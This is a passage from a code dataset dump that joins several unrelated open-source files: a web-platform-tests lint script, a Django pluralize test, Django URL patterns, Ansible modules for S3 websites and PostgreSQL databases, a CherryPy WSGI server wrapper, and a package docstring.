return [("PARSE-FAILED", "Unable to parse file", path, None)]
if source_file.type == "manual" and not source_file.name_is_manual:
errors.append(("CONTENT-MANUAL", "Manual test whose filename doesn't end in '-manual'", path, None))
if source_file.type == "visual" and not source_file.name_is_visual:
errors.append(("CONTENT-VISUAL", "Visual test whose filename doesn't end in '-visual'", path, None))
for reftest_node in source_file.reftest_nodes:
href = reftest_node.attrib.get("href", "").strip(space_chars)
parts = urlsplit(href)
if (parts.scheme or parts.netloc) and parts != urlsplit("about:blank"):
errors.append(("ABSOLUTE-URL-REF",
"Reference test with a reference file specified via an absolute URL: '%s'" % href, path, None))
continue
ref_url = urljoin(source_file.url, href)
ref_parts = urlsplit(ref_url)
if source_file.url == ref_url:
errors.append(("SAME-FILE-REF",
"Reference test which points at itself as a reference",
path,
None))
continue
assert ref_parts.path != ""
reference_file = os.path.join(repo_root, ref_parts.path[1:])
reference_rel = reftest_node.attrib.get("rel", "")
if not os.path.isfile(reference_file):
errors.append(("NON-EXISTENT-REF",
"Reference test with a non-existent '%s' relationship reference: '%s'" % (reference_rel, href), path, None))
if len(source_file.timeout_nodes) > 1:
errors.append(("MULTIPLE-TIMEOUT", "More than one meta name='timeout'", path, None))
for timeout_node in source_file.timeout_nodes:
timeout_value = timeout_node.attrib.get("content", "").lower()
if timeout_value != "long":
errors.append(("INVALID-TIMEOUT", "Invalid timeout value %s" % timeout_value, path, None))
if source_file.testharness_nodes:
if len(source_file.testharness_nodes) > 1:
errors.append(("MULTIPLE-TESTHARNESS",
"More than one <script src='/resources/testharness.js'>", path, None))
testharnessreport_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testharnessreport.js']")
if not testharnessreport_nodes:
errors.append(("MISSING-TESTHARNESSREPORT",
"Missing <script src='/resources/testharnessreport.js'>", path, None))
else:
if len(testharnessreport_nodes) > 1:
errors.append(("MULTIPLE-TESTHARNESSREPORT",
"More than one <script src='/resources/testharnessreport.js'>", path, None))
testharnesscss_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}link[@href='/resources/testharness.css']")
if testharnesscss_nodes:
errors.append(("PRESENT-TESTHARNESSCSS",
"Explicit link to testharness.css present", path, None))
for element in source_file.variant_nodes:
if "content" not in element.attrib:
errors.append(("VARIANT-MISSING",
"<meta name=variant> missing 'content' attribute", path, None))
else:
variant = element.attrib["content"]
if variant != "" and variant[0] not in ("?", "#"):
errors.append(("MALFORMED-VARIANT",
"%s <meta name=variant> 'content' attribute must be the empty string or start with '?' or '#'" % path, None))
seen_elements = {"timeout": False,
"testharness": False,
"testharnessreport": False}
required_elements = [key for key, value in {"testharness": True,
"testharnessreport": len(testharnessreport_nodes) > 0,
"timeout": len(source_file.timeout_nodes) > 0}.items()
if value]
for elem in source_file.root.iter():
if source_file.timeout_nodes and elem == source_file.timeout_nodes[0]:
seen_elements["timeout"] = True
if seen_elements["testharness"]:
errors.append(("LATE-TIMEOUT",
"<meta name=timeout> seen after testharness.js script", path, None))
elif elem == source_file.testharness_nodes[0]:
seen_elements["testharness"] = True
elif testharnessreport_nodes and elem == testharnessreport_nodes[0]:
seen_elements["testharnessreport"] = True
if not seen_elements["testharness"]:
errors.append(("EARLY-TESTHARNESSREPORT",
"testharnessreport.js script seen before testharness.js script", path, None))
if all(seen_elements[name] for name in required_elements):
break
if source_file.testdriver_nodes:
if len(source_file.testdriver_nodes) > 1:
errors.append(("MULTIPLE-TESTDRIVER",
"More than one <script src='/resources/testdriver.js'>", path, None))
testdriver_vendor_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testdriver-vendor.js']")
if not testdriver_vendor_nodes:
errors.append(("MISSING-TESTDRIVER-VENDOR",
"Missing <script src='/resources/testdriver-vendor.js'>", path, None))
else:
if len(testdriver_vendor_nodes) > 1:
errors.append(("MULTIPLE-TESTDRIVER-VENDOR",
"More than one <script src='/resources/testdriver-vendor.js'>", path, None))
for element in source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src]"):
src = element.attrib["src"]
for name in ["testharness", "testharnessreport", "testdriver", "testdriver-vendor"]:
if "%s.js" % name == src or ("/%s.js" % name in src and src != "/resources/%s.js" % name):
errors.append(("%s-PATH" % name.upper(), "%s.js script seen with incorrect path" % name, path, None))
return errors
class ASTCheck(object):
__metaclass__ = abc.ABCMeta
error = None
description = None
@abc.abstractmethod
def check(self, root):
pass
class OpenModeCheck(ASTCheck):
error = "OPEN-NO-MODE"
description = "File opened without providing an explicit mode (note: binary files must be read with 'b' in the mode flags)"
def check(self, root):
errors = []
for node in ast.walk(root):
if isinstance(node, ast.Call):
if hasattr(node.func, "id") and node.func.id in ("open", "file"):
if (len(node.args) < 2 and
all(item.arg != "mode" for item in node.keywords)):
errors.append(node.lineno)
return errors
ast_checkers = [item() for item in [OpenModeCheck]]
def check_python_ast(repo_root, path, f):
if not path.endswith(".py"):
return []
try:
root = ast.parse(f.read())
except SyntaxError as e:
return [("PARSE-FAILED", "Unable to parse file", path, e.lineno)]
errors = []
for checker in ast_checkers:
for lineno in checker.check(root):
errors.append((checker.error, checker.description, path, lineno))
return errors
broken_js_metadata = re.compile(b"//\s*META:")
broken_python_metadata = re.compile(b"#\s*META:")
def check_global_metadata(value):
global_values = {item.strip() for item in value.split(b",") if item.strip()}
included_variants = set.union(get_default_any_variants(),
*(get_any_variants(v) for v in global_values if not v.startswith(b"!")))
for global_value in global_values:
if global_value.startswith(b"!"):
excluded_value = global_value[1:]
if not get_any_variants(excluded_value):
yield ("UNKNOWN-GLOBAL-METADATA", "Unexpected value for global metadata")
elif excluded_value in global_values:
yield ("BROKEN-GLOBAL-METADATA", "Cannot specify both %s and %s" % (global_value, excluded_value))
else:
excluded_variants = get_any_variants(excluded_value)
if not (excluded_variants & included_variants):
yield ("BROKEN-GLOBAL-METADATA", "Cannot exclude %s if it is not included" % (excluded_value,))
else:
if not get_any_variants(global_value):
yield ("UNKNOWN-GLOBAL-METADATA", "Unexpected value for global metadata")
def check_script_metadata(repo_root, path, f):
if path.endswith((".worker.js", ".any.js")):
meta_re = js_meta_re
broken_metadata = broken_js_metadata
elif path.endswith(".py"):
meta_re = python_meta_re
broken_metadata = broken_python_metadata
else:
return []
done = False
errors = []
for idx, line in enumerate(f):
assert isinstance(line, binary_type), line
m = meta_re.match(line)
if m:
key, value = m.groups()
if key == b"global":
errors.extend((kind, message, path, idx + 1) for (kind, message) in check_global_metadata(value))
elif key == b"timeout":
if value != b"long":
errors.append(("UNKNOWN-TIMEOUT-METADATA", "Unexpected value for timeout metadata", path, idx + 1))
elif key == b"title":
pass
elif key == b"script":
pass
elif key == b"variant":
pass
else:
errors.append(("UNKNOWN-METADATA", "Unexpected kind of metadata", path, idx + 1))
else:
done = True
if done:
if meta_re.match(line):
errors.append(("STRAY-METADATA", "Metadata comments should start the file", path, idx + 1))
elif meta_re.search(line):
errors.append(("INDENTED-METADATA", "Metadata comments should start the line", path, idx + 1))
elif broken_metadata.search(line):
errors.append(("BROKEN-METADATA", "Metadata comment is not formatted correctly", path, idx + 1))
return errors
def check_path(repo_root, path):
"""
Runs lints that check the file path.
:param repo_root: the repository root
:param path: the path of the file within the repository
:returns: a list of errors found in ``path``
"""
errors = []
for path_fn in path_lints:
errors.extend(path_fn(repo_root, path))
return errors
def check_all_paths(repo_root, paths):
"""
Runs lints that check all paths globally.
:param repo_root: the repository root
:param paths: a list of all the paths within the repository
:returns: a list of errors found in ``f``
"""
errors = []
for paths_fn in all_paths_lints:
errors.extend(paths_fn(repo_root, paths))
return errors
def check_file_contents(repo_root, path, f):
"""
Runs lints that check the file contents.
:param repo_root: the repository root
:param path: the path of the file within the repository
:param f: a file-like object with the file contents
:returns: a list of errors found in ``f``
"""
errors = []
for file_fn in file_lints:
errors.extend(file_fn(repo_root, path, f))
f.seek(0)
return errors
def output_errors_text(errors):
for error_type, description, path, line_number in errors:
pos_string = path
if line_number:
pos_string += ":%s" % line_number
logger.error("%s: %s (%s)" % (pos_string, description, error_type))
def output_errors_markdown(errors):
if not errors:
return
heading = """Got lint errors:
| Error Type | Position | Message |
|------------|----------|---------|"""
for line in heading.split("\n"):
logger.error(line)
for error_type, description, path, line_number in errors:
pos_string = path
if line_number:
pos_string += ":%s" % line_number
logger.error("%s | %s | %s |" % (error_type, pos_string, description))
def output_errors_json(errors):
for error_type, error, path, line_number in errors:
print(json.dumps({"path": path, "lineno": line_number,
"rule": error_type, "message": error}))
def output_error_count(error_count):
if not error_count:
return
by_type = " ".join("%s: %d" % item for item in error_count.items())
count = sum(error_count.values())
logger.info("")
if count == 1:
logger.info("There was 1 error (%s)" % (by_type,))
else:
logger.info("There were %d errors (%s)" % (count, by_type))
def changed_files(wpt_root):
revish = testfiles.get_revish(revish=None)
changed, _ = testfiles.files_changed(revish, set(), include_uncommitted=True, include_new=True)
return [os.path.relpath(item, wpt_root) for item in changed]
def lint_paths(kwargs, wpt_root):
if kwargs.get("paths"):
paths = []
for path in kwargs.get("paths"):
if os.path.isdir(path):
path_dir = list(all_filesystem_paths(wpt_root, path))
paths.extend(path_dir)
elif os.path.isfile(path):
paths.append(os.path.relpath(os.path.abspath(path), wpt_root))
elif kwargs["all"]:
paths = list(all_filesystem_paths(wpt_root))
else:
changed_paths = changed_files(wpt_root)
force_all = False
for path in changed_paths:
path = path.replace(os.path.sep, "/")
if path == "lint.whitelist" or path.startswith("tools/lint/"):
force_all = True
break
paths = (list(changed_paths) if not force_all
else list(all_filesystem_paths(wpt_root)))
return paths
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument("paths", nargs="*",
help="List of paths to lint")
parser.add_argument("--json", action="store_true",
help="Output machine-readable JSON format")
parser.add_argument("--markdown", action="store_true",
help="Output markdown")
parser.add_argument("--repo-root", help="The WPT directory. Use this"
"option if the lint script exists outside the repository")
parser.add_argument("--all", action="store_true", help="If no paths are passed, try to lint the whole "
"working directory, not just files that changed")
return parser
def main(**kwargs):
if kwargs.get("json") and kwargs.get("markdown"):
logger.critical("Cannot specify --json and --markdown")
sys.exit(2)
repo_root = kwargs.get('repo_root') or localpaths.repo_root
output_format = {(True, False): "json",
(False, True): "markdown",
(False, False): "normal"}[(kwargs.get("json", False),
kwargs.get("markdown", False))]
if output_format == "markdown":
setup_logging(True)
paths = lint_paths(kwargs, repo_root)
return lint(repo_root, paths, output_format)
def lint(repo_root, paths, output_format):
error_count = defaultdict(int)
last = None
with open(os.path.join(repo_root, "lint.whitelist")) as f:
whitelist, ignored_files = parse_whitelist(f)
output_errors = {"json": output_errors_json,
"markdown": output_errors_markdown,
"normal": output_errors_text}[output_format]
def process_errors(errors):
"""
Filters and prints the errors, and updates the ``error_count`` object.
:param errors: a list of error tuples (error type, message, path, line number)
:returns: ``None`` if there were no errors, or
a tuple of the error type and the path otherwise
"""
errors = filter_whitelist_errors(whitelist, errors)
if not errors:
return None
output_errors(errors)
for error_type, error, path, line in errors:
error_count[error_type] += 1
return (errors[-1][0], path)
for path in paths[:]:
abs_path = os.path.join(repo_root, path)
if not os.path.exists(abs_path):
paths.remove(path)
continue
if any(fnmatch.fnmatch(path, file_match) for file_match in ignored_files):
paths.remove(path)
continue
errors = check_path(repo_root, path)
last = process_errors(errors) or last
if not os.path.isdir(abs_path):
with open(abs_path, 'rb') as f:
errors = check_file_contents(repo_root, path, f)
last = process_errors(errors) or last
errors = check_all_paths(repo_root, paths)
last = process_errors(errors) or last
if output_format in ("normal", "markdown"):
output_error_count(error_count)
if error_count:
for line in (ERROR_MSG % (last[0], last[1], last[0], last[1])).split("\n"):
logger.info(line)
return sum(itervalues(error_count))
path_lints = [check_path_length, check_worker_collision, check_ahem_copy]
all_paths_lints = [check_css_globally_unique]
file_lints = [check_regexp_line, check_parsed, check_python_ast, check_script_metadata]
# Don't break users of the lint that don't have git installed.
try:
subprocess.check_output(["git", "--version"])
all_paths_lints += [check_git_ignore]
except subprocess.CalledProcessError:
print('No git present; skipping .gitignore lint.')
if __name__ == "__main__":
args = create_parser().parse_args()
error_count = main(**vars(args))
if error_count > 0:
sys.exit(1)
|
phalt/django | refs/heads/master | tests/template_tests/filter_tests/test_pluralize.py | 430 | from decimal import Decimal
from django.template.defaultfilters import pluralize
from django.test import SimpleTestCase
class FunctionTests(SimpleTestCase):
def test_integers(self):
self.assertEqual(pluralize(1), '')
self.assertEqual(pluralize(0), 's')
self.assertEqual(pluralize(2), 's')
def test_floats(self):
self.assertEqual(pluralize(0.5), 's')
self.assertEqual(pluralize(1.5), 's')
def test_decimals(self):
self.assertEqual(pluralize(Decimal(1)), '')
self.assertEqual(pluralize(Decimal(0)), 's')
self.assertEqual(pluralize(Decimal(2)), 's')
def test_lists(self):
self.assertEqual(pluralize([1]), '')
self.assertEqual(pluralize([]), 's')
self.assertEqual(pluralize([1, 2, 3]), 's')
def test_suffixes(self):
self.assertEqual(pluralize(1, 'es'), '')
self.assertEqual(pluralize(0, 'es'), 'es')
self.assertEqual(pluralize(2, 'es'), 'es')
self.assertEqual(pluralize(1, 'y,ies'), 'y')
self.assertEqual(pluralize(0, 'y,ies'), 'ies')
self.assertEqual(pluralize(2, 'y,ies'), 'ies')
self.assertEqual(pluralize(0, 'y,ies,error'), '')
|
pombreda/django-hotclub | refs/heads/master | apps/local_apps/bbauth/urls.py | 5 | from django.conf.urls.defaults import *
urlpatterns = patterns('',
url(r'^login/$', 'bbauth.views.login'),
url(r'^success/$', 'bbauth.views.success'),
url(r'^logout/$', 'bbauth.views.logout'),
) |
lmazuel/ansible | refs/heads/devel | lib/ansible/modules/cloud/amazon/s3_website.py | 50 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: s3_website
short_description: Configure an s3 bucket as a website
description:
- Configure an s3 bucket as a website
version_added: "2.2"
author: Rob White (@wimnat)
options:
name:
description:
- "Name of the s3 bucket"
required: true
default: null
error_key:
description:
- "The object key name to use when a 4XX class error occurs. To remove an error key, set to None."
required: false
default: null
redirect_all_requests:
description:
- "Describes the redirect behavior for every request to this s3 bucket website endpoint"
required: false
default: null
region:
description:
- >
AWS region to create the bucket in. If not set then the value of the AWS_REGION and EC2_REGION environment variables are checked,
followed by the aws_region and ec2_region settings in the Boto config file. If none of those are set the region defaults to the
S3 Location: US Standard.
required: false
default: null
state:
description:
- "Add or remove s3 website configuration"
required: false
default: present
choices: [ 'present', 'absent' ]
suffix:
description:
- >
Suffix that is appended to a request that is for a directory on the website endpoint (e.g. if the suffix is index.html and you make a request to
samplebucket/images/ the data that is returned will be for the object with the key name images/index.html). The suffix must not include a slash
character.
required: false
default: index.html
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Configure an s3 bucket to redirect all requests to example.com
- s3_website:
name: mybucket.com
redirect_all_requests: example.com
state: present
# Remove website configuration from an s3 bucket
- s3_website:
name: mybucket.com
state: absent
# Configure an s3 bucket as a website with index and error pages
- s3_website:
name: mybucket.com
suffix: home.htm
error_key: errors/404.htm
state: present
'''
RETURN = '''
index_document:
description: index document
type: complex
returned: always
contains:
suffix:
description: suffix that is appended to a request that is for a directory on the website endpoint
returned: success
type: string
sample: index.html
error_document:
description: error document
type: complex
returned: always
contains:
key:
description: object key name to use when a 4XX class error occurs
returned: when error_document parameter set
type: string
sample: error.html
redirect_all_requests_to:
description: where to redirect requests
type: complex
returned: always
contains:
host_name:
description: name of the host where requests will be redirected.
returned: when redirect all requests parameter set
type: string
sample: ansible.com
routing_rules:
description: routing rules
type: complex
returned: always
contains:
routing_rule:
host_name:
description: name of the host where requests will be redirected.
returned: when host name set as part of redirect rule
type: string
sample: ansible.com
condition:
key_prefix_equals:
description: object key name prefix when the redirect is applied. For example, to redirect requests for ExamplePage.html, the key prefix will be
ExamplePage.html
returned: when routing rule present
type: string
sample: docs/
redirect:
replace_key_prefix_with:
description: object key prefix to use in the redirect request
returned: when routing rule present
type: string
sample: documents/
'''
import time
try:
from botocore.exceptions import ClientError, ParamValidationError, NoCredentialsError
import boto3
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def _create_redirect_dict(url):
redirect_dict = {}
url_split = url.split(':')
# Did we split anything?
if len(url_split) == 2:
redirect_dict[u'Protocol'] = url_split[0]
redirect_dict[u'HostName'] = url_split[1].replace('//', '')
elif len(url_split) == 1:
redirect_dict[u'HostName'] = url_split[0]
else:
raise ValueError('Redirect URL appears invalid')
return redirect_dict
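# Illustrative note (not part of the original module): _create_redirect_dict
# maps 'https://example.com' to {'Protocol': 'https', 'HostName': 'example.com'},
# a bare 'example.com' to {'HostName': 'example.com'}, and raises ValueError
# for anything with more than one ':'.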
def _create_website_configuration(suffix, error_key, redirect_all_requests):
website_configuration = {}
if error_key is not None:
website_configuration['ErrorDocument'] = { 'Key': error_key }
if suffix is not None:
website_configuration['IndexDocument'] = { 'Suffix': suffix }
if redirect_all_requests is not None:
website_configuration['RedirectAllRequestsTo'] = _create_redirect_dict(redirect_all_requests)
return website_configuration
def enable_or_update_bucket_as_website(client_connection, resource_connection, module):
bucket_name = module.params.get("name")
redirect_all_requests = module.params.get("redirect_all_requests")
# If redirect_all_requests is set then don't use the default suffix that has been set
if redirect_all_requests is not None:
suffix = None
else:
suffix = module.params.get("suffix")
error_key = module.params.get("error_key")
changed = False
try:
bucket_website = resource_connection.BucketWebsite(bucket_name)
except ClientError as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
try:
website_config = client_connection.get_bucket_website(Bucket=bucket_name)
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchWebsiteConfiguration':
website_config = None
else:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
if website_config is None:
try:
bucket_website.put(WebsiteConfiguration=_create_website_configuration(suffix, error_key, redirect_all_requests))
changed = True
except (ClientError, ParamValidationError) as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
except ValueError as e:
module.fail_json(msg=str(e))
else:
try:
if (suffix is not None and website_config['IndexDocument']['Suffix'] != suffix) or \
(error_key is not None and website_config['ErrorDocument']['Key'] != error_key) or \
(redirect_all_requests is not None and website_config['RedirectAllRequestsTo'] != _create_redirect_dict(redirect_all_requests)):
try:
bucket_website.put(WebsiteConfiguration=_create_website_configuration(suffix, error_key, redirect_all_requests))
changed = True
except (ClientError, ParamValidationError) as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
except KeyError as e:
try:
bucket_website.put(WebsiteConfiguration=_create_website_configuration(suffix, error_key, redirect_all_requests))
changed = True
except (ClientError, ParamValidationError) as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
except ValueError as e:
module.fail_json(msg=str(e))
# Wait 5 secs before getting the website_config again to give it time to update
time.sleep(5)
website_config = client_connection.get_bucket_website(Bucket=bucket_name)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(website_config))
def disable_bucket_as_website(client_connection, module):
changed = False
bucket_name = module.params.get("name")
try:
client_connection.get_bucket_website(Bucket=bucket_name)
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchWebsiteConfiguration':
module.exit_json(changed=changed)
else:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
try:
client_connection.delete_bucket_website(Bucket=bucket_name)
changed = True
except ClientError as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
module.exit_json(changed=changed)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(type='str', required=True),
state=dict(type='str', required=True, choices=['present', 'absent']),
suffix=dict(type='str', required=False, default='index.html'),
error_key=dict(type='str', required=False),
redirect_all_requests=dict(type='str', required=False)
)
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive = [
['redirect_all_requests', 'suffix'],
['redirect_all_requests', 'error_key']
])
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
client_connection = boto3_conn(module, conn_type='client', resource='s3', region=region, endpoint=ec2_url, **aws_connect_params)
resource_connection = boto3_conn(module, conn_type='resource', resource='s3', region=region, endpoint=ec2_url, **aws_connect_params)
else:
module.fail_json(msg="region must be specified")
state = module.params.get("state")
if state == 'present':
enable_or_update_bucket_as_website(client_connection, resource_connection, module)
elif state == 'absent':
disable_bucket_as_website(client_connection, module)
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
|
arjclark/cylc | refs/heads/master | lib/cherrypy/_cpwsgi_server.py | 68 | """WSGI server interface (see PEP 333). This adds some CP-specific bits to
the framework-agnostic wsgiserver package.
"""
import sys
import cherrypy
from cherrypy import wsgiserver
class CPWSGIServer(wsgiserver.CherryPyWSGIServer):
"""Wrapper for wsgiserver.CherryPyWSGIServer.
wsgiserver has been designed to not reference CherryPy in any way,
so that it can be used in other frameworks and applications. Therefore,
we wrap it here, so we can set our own mount points from cherrypy.tree
and apply some attributes from config -> cherrypy.server -> wsgiserver.
"""
def __init__(self, server_adapter=cherrypy.server):
self.server_adapter = server_adapter
self.max_request_header_size = (
self.server_adapter.max_request_header_size or 0
)
self.max_request_body_size = (
self.server_adapter.max_request_body_size or 0
)
server_name = (self.server_adapter.socket_host or
self.server_adapter.socket_file or
None)
self.wsgi_version = self.server_adapter.wsgi_version
s = wsgiserver.CherryPyWSGIServer
s.__init__(self, server_adapter.bind_addr, cherrypy.tree,
self.server_adapter.thread_pool,
server_name,
max=self.server_adapter.thread_pool_max,
request_queue_size=self.server_adapter.socket_queue_size,
timeout=self.server_adapter.socket_timeout,
shutdown_timeout=self.server_adapter.shutdown_timeout,
accepted_queue_size=self.server_adapter.accepted_queue_size,
accepted_queue_timeout=self.server_adapter.accepted_queue_timeout,
)
self.protocol = self.server_adapter.protocol_version
self.nodelay = self.server_adapter.nodelay
if sys.version_info >= (3, 0):
ssl_module = self.server_adapter.ssl_module or 'builtin'
else:
ssl_module = self.server_adapter.ssl_module or 'pyopenssl'
if self.server_adapter.ssl_context:
adapter_class = wsgiserver.get_ssl_adapter_class(ssl_module)
self.ssl_adapter = adapter_class(
self.server_adapter.ssl_certificate,
self.server_adapter.ssl_private_key,
self.server_adapter.ssl_certificate_chain)
self.ssl_adapter.context = self.server_adapter.ssl_context
elif self.server_adapter.ssl_certificate:
adapter_class = wsgiserver.get_ssl_adapter_class(ssl_module)
self.ssl_adapter = adapter_class(
self.server_adapter.ssl_certificate,
self.server_adapter.ssl_private_key,
self.server_adapter.ssl_certificate_chain)
self.stats['Enabled'] = getattr(
self.server_adapter, 'statistics', False)
def error_log(self, msg="", level=20, traceback=False):
cherrypy.engine.log(msg, level, traceback)
|
troycomi/microMS | refs/heads/master | CoordinateMappers/__init__.py | 1 | '''
Package with all coordinate system mappers and connected instruments
brukerMapper.py: An abstract base class implementing coordinateMapper specific
for bruker type instruments using their fractional distance.
connectedInstrument.py: An abstract base class specifying functions required for
interacting with a connected instrument
coordinateMapper.py: An abstract base class with some standard methods for mapping
pixel positions to physical locations in an instrument.
flexImagingSolarix.py: An extension of solarixMapper which generates files suitable
for acquisition with flexImaging.
oMaldiMapper.py: Implementation of coordinate mapper for acquisition with the
AB Sciex oMaldi server. Contains methods for slop correction
solarixMapper.py: Implementation of brukerMapper for the solarix FT-ICR
that generates xeo and xls files for autoacquisition
supportedCoordSystems.py: A collection of coordinate mappers. Only mappers included here
will be accessible to the GUI
ultraflexMapper.py: An implementation of brukerMapper for the ultraflextreme tof/tof
that generates xeo files for autoexecute
zaber3axis.py: Concrete implementation of a connected instrument for an XYZ stage
for liquid microjunction extraction.
zaberInterface.py: An abstract base class with methods for interacting with zaber
linear actuators.
zaberMapper.py: An implementation of coordinateMapper with a connected zaber3axis
used for the liquid microjunction extraction.
''' |
n0trax/ansible | refs/heads/devel | lib/ansible/modules/database/postgresql/postgresql_db.py | 9 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: postgresql_db
short_description: Add or remove PostgreSQL databases from a remote host.
description:
- Add or remove PostgreSQL databases from a remote host.
version_added: "0.6"
options:
name:
description:
- name of the database to add or remove
required: true
default: null
aliases: [ db ]
owner:
description:
- Name of the role to set as owner of the database
required: false
default: null
template:
description:
- Template used to create the database
required: false
default: null
encoding:
description:
- Encoding of the database
required: false
default: null
lc_collate:
description:
- Collation order (LC_COLLATE) to use in the database. Must match collation order of template database unless C(template0) is used as template.
required: false
default: null
lc_ctype:
description:
- Character classification (LC_CTYPE) to use in the database (e.g. lower, upper, ...) Must match LC_CTYPE of template database unless C(template0)
is used as template.
required: false
default: null
state:
description: |
The database state. present implies that the database should be created if necessary.
absent implies that the database should be removed if present.
dump requires a target definition to which the database will be backed up.
(Added in 2.4) restore also requires a target definition from which the database will be restored.
(Added in 2.4) The format of the backup will be detected based on the target name.
Supported compression formats for dump and restore are: .bz2, .gz, and .xz
Supported formats for dump and restore are: .sql and .tar
required: false
default: present
choices: [ "present", "absent", "dump", "restore" ]
target:
version_added: "2.4"
description:
- File to back up or restore from. Used when state is "dump" or "restore"
target_opts:
version_added: "2.4"
description:
- Further arguments for pg_dump or pg_restore. Used when state is "dump" or "restore"
author: "Ansible Core Team"
extends_documentation_fragment:
- postgres
'''
EXAMPLES = '''
# Create a new database with name "acme"
- postgresql_db:
name: acme
# Create a new database with name "acme" and specific encoding and locale
# settings. If a template different from "template0" is specified, encoding
# and locale settings must match those of the template.
- postgresql_db:
name: acme
encoding: UTF-8
lc_collate: de_DE.UTF-8
lc_ctype: de_DE.UTF-8
template: template0
# Dump an existing database to a file
- postgresql_db:
name: acme
state: dump
target: /tmp/acme.sql
# Dump an existing database to a file (with compression)
- postgresql_db:
name: acme
state: dump
target: /tmp/acme.sql.gz
# Dump a single schema for an existing database
- postgresql_db:
name: acme
state: dump
target: /tmp/acme.sql
target_opts: "-n public"
'''
import traceback
HAS_PSYCOPG2 = False
try:
import psycopg2
import psycopg2.extras
import pipes
import subprocess
import os
except ImportError:
pass
else:
HAS_PSYCOPG2 = True
import ansible.module_utils.postgres as pgutils
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.database import SQLParseError, pg_quote_identifier
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
class NotSupportedError(Exception):
pass
# ===========================================
# PostgreSQL module specific support methods.
#
def set_owner(cursor, db, owner):
query = "ALTER DATABASE %s OWNER TO %s" % (
pg_quote_identifier(db, 'database'),
pg_quote_identifier(owner, 'role'))
cursor.execute(query)
return True
def get_encoding_id(cursor, encoding):
query = "SELECT pg_char_to_encoding(%(encoding)s) AS encoding_id;"
cursor.execute(query, {'encoding': encoding})
return cursor.fetchone()['encoding_id']
def get_db_info(cursor, db):
query = """
SELECT rolname AS owner,
pg_encoding_to_char(encoding) AS encoding, encoding AS encoding_id,
datcollate AS lc_collate, datctype AS lc_ctype
FROM pg_database JOIN pg_roles ON pg_roles.oid = pg_database.datdba
WHERE datname = %(db)s
"""
cursor.execute(query, {'db': db})
return cursor.fetchone()
def db_exists(cursor, db):
query = "SELECT * FROM pg_database WHERE datname=%(db)s"
cursor.execute(query, {'db': db})
return cursor.rowcount == 1
def db_delete(cursor, db):
if db_exists(cursor, db):
query = "DROP DATABASE %s" % pg_quote_identifier(db, 'database')
cursor.execute(query)
return True
else:
return False
def db_create(cursor, db, owner, template, encoding, lc_collate, lc_ctype):
params = dict(enc=encoding, collate=lc_collate, ctype=lc_ctype)
if not db_exists(cursor, db):
query_fragments = ['CREATE DATABASE %s' % pg_quote_identifier(db, 'database')]
if owner:
query_fragments.append('OWNER %s' % pg_quote_identifier(owner, 'role'))
if template:
query_fragments.append('TEMPLATE %s' % pg_quote_identifier(template, 'database'))
if encoding:
query_fragments.append('ENCODING %(enc)s')
if lc_collate:
query_fragments.append('LC_COLLATE %(collate)s')
if lc_ctype:
query_fragments.append('LC_CTYPE %(ctype)s')
query = ' '.join(query_fragments)
cursor.execute(query, params)
return True
else:
db_info = get_db_info(cursor, db)
if (encoding and
get_encoding_id(cursor, encoding) != db_info['encoding_id']):
raise NotSupportedError(
'Changing database encoding is not supported. '
'Current encoding: %s' % db_info['encoding']
)
elif lc_collate and lc_collate != db_info['lc_collate']:
raise NotSupportedError(
'Changing LC_COLLATE is not supported. '
'Current LC_COLLATE: %s' % db_info['lc_collate']
)
elif lc_ctype and lc_ctype != db_info['lc_ctype']:
raise NotSupportedError(
                'Changing LC_CTYPE is not supported. '
'Current LC_CTYPE: %s' % db_info['lc_ctype']
)
elif owner and owner != db_info['owner']:
return set_owner(cursor, db, owner)
else:
return False
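# Hedged sketch of what db_create builds (assuming pg_quote_identifier leaves
# plain names unquoted): db_create(cursor, "acme", "bob", "template0", "UTF-8",
# None, None) executes roughly
#     CREATE DATABASE acme OWNER bob TEMPLATE template0 ENCODING 'UTF-8'
# with the encoding value passed as a psycopg2 parameter, not interpolated.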
